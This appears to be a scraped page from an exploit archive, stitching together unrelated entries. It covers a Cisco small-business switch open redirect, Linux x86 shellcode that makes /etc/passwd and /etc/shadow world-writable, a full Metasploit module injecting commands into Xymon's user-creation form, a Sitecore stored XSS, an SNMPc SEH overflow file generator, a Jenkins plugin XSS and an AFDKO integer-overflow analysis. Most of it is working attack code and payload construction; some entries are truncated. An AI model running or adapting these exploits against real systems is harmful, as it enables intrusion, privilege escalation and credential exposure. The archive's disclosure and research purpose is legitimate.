Cisco Small Business switches versions 200, 300, and 500 suffer from information leakage and open redirection vulnerabilities.

MD5 | eb2b5e1203a3fa2ae1b9100c12d53de7

# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website:
# Vendor Homepage:
# Affected Devices: All Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled.
# Tested On: Cisco C300 Switch
# Version:
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Hardware, Web Apps
# Reference :


Vulnerability 1: Information Gathering


An unauthenticated user can find the version number and device type by visiting the link below directly.

Affected URL:



Vulnerability 2: Open Redirect via the Host header.


Changing the Host header to a different domain makes the device redirect the request to that domain. An attacker can point the redirect at a fake website for phishing; it can also be used for domain fronting.

Normal Request

GET / HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0

Normal Response

HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

This document has moved to a new location.
Please update your documents to reflect the new location.


Host header changed to a different domain (example


GET /cs703dae2c HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1


HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=false
Server: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

This document has moved to a new location.
Please update your documents to reflect the new location.

The redirection goes to the domain supplied in the Host header. The attacker needs to be on the same network and must be able to modify the victim's request on the wire in order to trigger this vulnerability.

Attack Vector:
Can be used for domain fronting.

curl -k --header "Host:" "domainname of the cisco device"

Vendor Response:

Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.

Issue 2:
The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.

We have assigned CVE CVE-2019-1943 for this issue.


61 bytes small Linux/x86 chmod 666 /etc/passwd and chmod 666 /etc/shadow shellcode.

MD5 | 1d275af34ac3eb4e6782353a61ffbebe

# Exploit Title: Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow (61 bytes)
# Date: 10/07/2019
# Exploit Author: Xavier Invers Fornells
# Contact:
# Tested on: Debian 4.19.28
# Architecture: x86
# Size: 61 bytes

#################################### chmod.nasm ####################################

global _start
section .text

_start:
    ; chmod("/etc/passwd", 0666) -- syscall 15 is chmod on Linux/x86
    push byte 15
    pop eax
    push byte 0x64          ; "d" followed by the NUL terminator (imm8 is sign-extended to a dword)
    push word 0x7773        ; "sw"
    push 0x7361702f         ; "/pas"
    push 0x6374652f         ; "/etc"
    mov ebx, esp            ; ebx -> "/etc/passwd"

    push word 0x1b6         ; 0666 (a 16-bit push popped as 32 bits; the kernel masks the mode to 07777)
    pop ecx

    int 0x80

    ; chmod("/etc/shadow", 0666)
    push byte 15
    pop eax
    push byte 0x77          ; "w" followed by the NUL terminator
    push word 0x6f64        ; "do"
    push 0x6168732f         ; "/sha"
    push 0x6374652f         ; "/etc"
    mov ebx, esp            ; ebx -> "/etc/shadow"

    push word 0x1b6
    pop ecx

    int 0x80

    ; exit() -- syscall 1
    push byte 1
    pop eax
    int 0x80

#################################### shellcode.c ####################################


#include <stdio.h>
#include <string.h>

/* Build with an executable stack (e.g. gcc -m32 -z execstack -fno-stack-protector)
 * so that code[] can be jumped into. The shellcode bytes are elided on the page;
 * paste the assembled output of chmod.nasm here. */
unsigned char code[] = "";

int main(void)
{
    printf("Shellcode Length: %d\n", (int)strlen(code));

    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}



This Metasploit module exploits a command injection vulnerability in Xymon versions before 4.3.25 which allows authenticated users to execute arbitrary operating system commands as the web server user. When adding a new user to the system via the web interface with, the user’s username and password are passed to htpasswd in a call to system() without validation. This module has been tested successfully on Xymon version 4.3.10 on Debian 6.

MD5 | 5d1fdb4c7a1abc1fbc3c13a84a4a2eef

# This module requires Metasploit:
# Current source:

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Xymon useradm Command Execution',
      'Description' => %q{
        This module exploits a command injection vulnerability in Xymon
        versions before 4.3.25 which allows authenticated users
        to execute arbitrary operating system commands as the web
        server user.

        When adding a new user to the system via the web interface with
        ``, the user's username and password are passed to
        `htpasswd` in a call to `system()` without validation.

        This module has been tested successfully on Xymon version 4.3.10
        on Debian 6.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Markus Krell', # Discovery
        'bcoles' # Metasploit
      ],
      'References' => [
        ['CVE', '2016-2056'],
        ['PACKETSTORM', '135758'],
        ['URL', ''],
        ['URL', ''],
        ['URL', ''],
        ['URL', '']
      ],
      'DisclosureDate' => '2016-02-14',
      'Platform' => %w(unix linux solaris bsd),
      'Targets' => [
        ['Unix CMD',
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Payload' => {
            'Space' => 2048,
            'BadChars' => "\x00\x0A\x0D",
            'DisableNops' => true,
            'Compat' => {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python netcat php'
            }
          }
        ],
        # The display names of the native targets are not on the page; the
        # platform names are used as labels here.
        ['Linux',
          'Platform' => 'linux',
          'Arch' => [ARCH_X86, ARCH_X64]
        ],
        ['Solaris',
          'Platform' => 'solaris',
          'Arch' => [ARCH_X86]
        ],
        ['BSD',
          'Platform' => 'bsd',
          'Arch' => [ARCH_X86, ARCH_X64]
        ]
      ],
      'Privileged' => false,
      'DefaultTarget' => 0))
    register_options([
      OptString.new('TARGETURI', [true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/']),
      OptString.new('USERNAME', [true, 'The username for Xymon']),
      OptString.new('PASSWORD', [true, 'The password for Xymon'])
    ])
  end

  def user
    datastore['USERNAME']
  end

  def pass
    datastore['PASSWORD']
  end

  def check
    # The CGI script name is elided on the page; the path stays as given.
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, ''),
      'authorization' => basic_auth(user, pass)
    })

    unless res
      vprint_status "#{peer} - Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 401
      vprint_status "#{peer} - Authentication failed"
      return CheckCode::Unknown
    end

    if res.code == 404
      vprint_status "#{peer} - not found"
      return CheckCode::Safe
    end

    unless res.body.include?('Xymon')
      vprint_status "#{peer} - Target is not a Xymon server."
      return CheckCode::Safe
    end

    # Version string is rendered as ">Xymon 4.3.x<" in the page body
    version = res.body.scan(/>Xymon ([\d.]+)</).flatten.first

    unless version
      vprint_status "#{peer} - Could not determine Xymon version"
      return CheckCode::Detected
    end

    vprint_status "#{peer} - Xymon version #{version}"

    if Gem::Version.new(version) >= Gem::Version.new('4.3.25')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def execute_command(cmd, opts = {})
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, ''),
      'method' => 'POST',
      'authorization' => basic_auth(user, pass),
      'vars_post' => Hash[{
        'USERNAME' => "';#{cmd} & echo '",
        'PASSWORD' => '',
        'SendCreate' => 'Create'
      }]
    }, 5)

    return if session_created?

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code == 401
      fail_with(Failure::NoAccess, 'Authentication failed')
    end

    unless res.code == 500
      fail_with(Failure::Unknown, 'Unexpected reply')
    end

    print_good "#{peer} - Payload sent successfully"
  end

  def exploit
    unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check)
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if payload.arch.first == 'cmd'
      execute_command(payload.encoded)
    else
      execute_cmdstager(linemax: 1_500)
    end
  end
end

Sitecore version 9.0 rev 171002 suffers from a persistent cross site scripting vulnerability.

MD5 | 39d6c982acaa37a46cb0a8d2e1d7da4c

# Exploit Title: Stored Cross Site Scripting (XSS) in Sitecore 9.0 rev 171002
# Date: July 11, 2019
# Exploit Author: Owais Mehtab
# Vendor Homepage:
# Version: 9.0 rev. 171002
# Tested on: Sitecore Experience Platform 8.1 Update-3 i.e.; 8.1 rev. 160519
# CVE : CVE-2019-13493

Vendor Description
Sitecore CMS makes it effortless to create content and experience rich websites that help you achieve your business goals such as increasing sales and search engine visibility, while being straight-forward to integrate and administer. Sitecore lets you deliver sites that are highly scalable, robust and secure. Whether you're focused on marketing, development and design, or providing site content, Sitecore delivers for you.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Vulnerability Class
Cross-site Scripting (XSS) -

Proof of Concept
The File Extension parameter is not properly escaped. This could lead to an XSS attack affecting administrators, users and editors.

1. Log in to the application and navigate to " Editor.aspx?sw_bw=1"
2. Go to the media library, click on any image and edit it
3. In the Extension input parameter, inject any XSS vector like '">

SNMPc Enterprise Edition versions 9 and 10 suffer from a mapping filename buffer overflow vulnerability.

MD5 | 109af1e27d2b7507c41e3905ac72c086

# -*- coding: utf-8 -*-

# Exploit: SNMPc Enterprise Edition (9 & 10) (Mapping File Name BOF) #
# Date: 11 July 2019 #
# Exploit Author: @xerubus | #
# Vendor Homepage: #
# Software Link: #
# Version: Enterprise Edition 9 & 10 #
# Tested on: Windows 7 #
# CVE-ID: CVE-2019-13494 #
# Full write-up: #
import sys, os


filename = "evilmap.csv"  # output file, as named in the final status message

junk = b"A" * 2064
nseh = b"\xeb\x07\x90\x90"  # short jmp to 0018f58d: \xeb\x07\x90\x90
seh = b"\x05\x3c\x0e\x10"   # 0x100e3c05 ; pop esi # pop edi # ret (C:\program files (x86)\snmpc network manager\CRDBAPI.dll)

# Pre-padding of mapping file. Note mandatory trailing carriage return.
pre_padding = (
    b"Name,Type,Address,ObjectID,Description,ID,Group1,Group2,Icon,Bitmap,Bitmap Scale,Shape/Thickness,Parent,Coordinates,Linked Nodes,Show Label,API Exec,MAC,Polling Agent,Poll Interval,Poll Timeout,Poll Retries,Status Variable,Status Value,Status Expression,Services,Status,Get Community,Set Community,Trap Community,Read Access Mode,Read/Write Access Mode,V3 NoAuth User,V3 Auth User,V3 Auth Password,V3 Priv Password\n"
    b'"Root Subnet","Subnet","","","","2","000=Unknown","","auto.ico","","2","Square","(NULL)","(0,0)","N/A","True","auto.exe","00 00 00 00 00 00","","30","2","2","","0","0","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""\n'
)

# Post-padding of mapping file. Note mandatory trailing carriage return.
post_padding = (
    b'","Device","","","","3","000=Unknown","000=Unknown","auto.ico","","2","Square","Root Subnet(2)","(-16,-64)","N/A","True","auto.exe","00 00 00 00 00 00","","30","2","2","","0","=","","Normal-Green","public","netman","public","SNMP V1","SNMP V1","","","",""\n'
)

# msfvenom --platform windows -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f c
shellcode = (
    b""  # the shellcode bytes are elided on the page; generate them with the msfvenom command above
)

print("[+] Building payload..")
payload = b"\x90" * 10 + shellcode
print("[+] Creating buffer..")
buffer = pre_padding + junk + nseh + seh + payload + b"\x90" * 10 + post_padding
print("[+] Writing evil mapping file..")
with open(filename, 'wb') as textfile:
    textfile.write(buffer)
print("[+] Done. Import evilmap.csv into SNMPc and A Wild Calc Appears!\n\n")

Jenkins Dependency Graph View plugin version 0.13 suffers from a persistent cross site scripting vulnerability.

MD5 | c1ce6b865eb9188b93661b01f4e2d546

# Exploit Title: Persistent XSS - Dependency Graph View Plugin (v0.13)
# Vendor Homepage:
# Exploit Author: Ishaq Mohammed
# Contact:
# Website:
# Category: webapps
# Platform: Java
# CVE: CVE-2019-10349
# Jenkins issue: #SECURITY-1177

1. Description:
The "Display Name" field in the General Options of the Configure module in
Jenkins accepts arbitrary values. When the Dependency Graph View module
loads that value, it is executed, which makes the plugin vulnerable to a
Stored/Persistent XSS.
2. Proof of Concept:
Vulnerable Source
Steps to Reproduce:
Login to Jenkins Server with valid credentials and ensure that the
dependency graph plugin is installed.
1. Click on configure the Jenkins plugin.
2. Select advanced options
3. Enter the XSS payload in the "Display Name" field
4. Navigate to Dependency Graph module
5. Observe the Executed Payload
6. Payload used for the demo:

3. Solution:
As of publication of this advisory, there is no fix.
The plugin has been abandoned by the maintainer.


Best Regards,
Ishaq Mohammed

There is a Microsoft Font Subsetting DLL heap corruption vulnerability in ComputeFormat4CmapData.

MD5 | 1e6e251496d7be9a3bc32fd32fae64ff

Microsoft DirectWrite / AFDKO suffers from a heap-baeed out-of-bounds read/write vulnerability in OpenType font handling due to empty ROS strings.

MD5 | b63dfd0988e7941848953c7d532f19e2

Microsoft DirectWrite / AFDKO suffers from having an insufficient integer overflow check in dnaGrow.

MD5 | d82c47ee0ae57de226097bbbba93f262

Microsoft DirectWrite / AFDKO insufficient integer overflow check in dnaGrow 

-----=====[ Background ]=====-----

AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.

At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.

We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.

One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.

-----=====[ Description ]=====-----

The AFDKO library has its own implementation of dynamic arrays, semantically resembling e.g. std::vector from C++. These objects are implemented in c/public/lib/source/dynarr/dynarr.c and c/public/lib/api/dynarr.h. One of the more important functions operating on dynarrays is dnaGrow(), designed to extend a dynamic array or set its initial size. It is used by numerous other routines such as dnaSetCnt, dnaIndex, dnaMax, dnaNext, dnaExtend, or the dnaSET_CNT macro. It should be noted that it is potentially possible for the function's arguments to be unsanitized values loaded directly from an input font.

In order to prevent security vulnerabilities stemming from arithmetic errors while calculating buffer lengths, dnaGrow() explicitly checks for integer overflow conditions. One example of such check is shown below:

--- cut ---
79 } else if (da->size == 0) {
80 /* Initial allocation */
81 size_t init = (size_t)da->array;
82 size_t new_mem_size;
83 new_size = ((size_t)index incr) / da->incr * da->incr;
84 new_mem_size = new_size * elemsize;
85 if (new_mem_size / elemsize == new_size) /* check math overflow */
86 new_ptr = h->mem.manage(&h->mem, NULL, new_mem_size);
87 else
88 new_ptr = NULL;
89 } else {
--- cut ---

The if statement in line 85 guarantees that "new_mem_size" is exactly the product of "new_size" and "elemsize", and an integer overflow doesn't take place. There is also a similar check in another code branch a few lines below:

--- cut ---
89 } else {
90 /* Incremental allocation */
91 new_size = da->size +
92 ((index - da->size) + da->incr) / da->incr * da->incr;
93 if (new_size * elemsize >= new_size) /* check math overflow */
94 new_ptr = h->mem.manage(&h->mem, da->array, new_size * elemsize);
95 else
96 new_ptr = NULL;
97 }
--- cut ---

Here, the overflow check in line 93 is incorrect. It is possible to craft the "new_size" and "elemsize" values such that an undetected integer overflow takes place. For instance, on 32-bit platforms, if new_size=0x58000000 and elemsize=0x4, then (size_t)(new_size * elemsize) is 0x60000000, truncated from the actual result of 0x160000000. These example values pass the above sanity check, but still lead to the allocation of a too small buffer in relation to the requested number of elements.

While there is an evident problem in the code, we haven't found an obvious way to exploit it after a brief analysis. We believe that this is mostly caused by the fact that the faulty code is found in a code branch responsible for incrementally extending the size of a non-empty array, and not the one performing the initial allocation. There are few arrays which are grown dynamically during the library run time; most of them have their length set only once and never changed later on. It is even more difficult to find a dynamically extended array which accepts completely arbitrary element counts.

Nevertheless, given the right set of conditions (currently or in the future), this bug might facilitate the exploitation of an integer overflow condition that would otherwise be impossible to trigger. As such an integer overflow could subsequently lead to memory corruption, we decided to report the problem despite the apparent lack of an attack vector at this moment. We recommend fixing it by using the correct overflow check construct from line 85.
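To make the difference between the two checks concrete, here is an added example (not AFDKO code) that emulates the 32-bit size_t arithmetic of the platform discussed above with uint32_t and runs both checks on the values quoted in the description; the function names are my own, and the helper at the end shows the division-based construct from line 85 used the way the advisory recommends.

```c
#include <stdint.h>
#include <stdio.h>

/* Emulates size_t on the 32-bit platform discussed above (constructed example). */
typedef uint32_t sz32;

/* The product as the 32-bit platform computes it: wraps modulo 2^32. */
sz32 wrapped_mem_size(sz32 new_size, sz32 elemsize)
{
    return (sz32)(new_size * elemsize);
}

/* The check from line 93 of dnaGrow(): "new_size * elemsize >= new_size".
 * Returns 1 if the allocation would be accepted. A wrapped product that
 * happens to land at or above new_size slips through. */
int incremental_check_accepts(sz32 new_size, sz32 elemsize)
{
    return wrapped_mem_size(new_size, elemsize) >= new_size;
}

/* The check from line 85: "new_mem_size / elemsize == new_size".
 * Division undoes a non-wrapping multiplication exactly, so any wrap is
 * detected (elemsize == 0 is rejected here to avoid dividing by zero). */
int initial_check_accepts(sz32 new_size, sz32 elemsize)
{
    if (elemsize == 0)
        return 0;
    return wrapped_mem_size(new_size, elemsize) / elemsize == new_size;
}

/* Growth helper written the way the advisory recommends: returns the byte
 * count to allocate, or 0 when new_size * elemsize would overflow. */
sz32 checked_mem_size(sz32 new_size, sz32 elemsize)
{
    return initial_check_accepts(new_size, elemsize)
           ? wrapped_mem_size(new_size, elemsize) : 0;
}

int main(void)
{
    sz32 new_size = 0x58000000u, elemsize = 4u; /* values from the description */
    printf("new_size=0x%x elemsize=%u wrapped product=0x%x\n",
           (unsigned)new_size, (unsigned)elemsize,
           (unsigned)wrapped_mem_size(new_size, elemsize));
    printf("line 93 check accepts: %d\n", incremental_check_accepts(new_size, elemsize));
    printf("line 85 check accepts: %d\n", initial_check_accepts(new_size, elemsize));
    printf("checked allocation size: %u\n", (unsigned)checked_mem_size(new_size, elemsize));
    return 0;
}
```

The weak check does catch products that wrap all the way to zero (e.g. new_size=0x40000000, elemsize=4), which is why it looks plausible; it only fails for wrapped values that land above new_size.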

-----=====[ References ]=====-----


This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by:

Microsoft DirectWrite / AFDKO suffers from a stack corruption vulnerability in OpenType font handling while processing CFF blend DICT operator.

MD5 | 743e9318dc7ba438e2b58cc2c6bfdc2f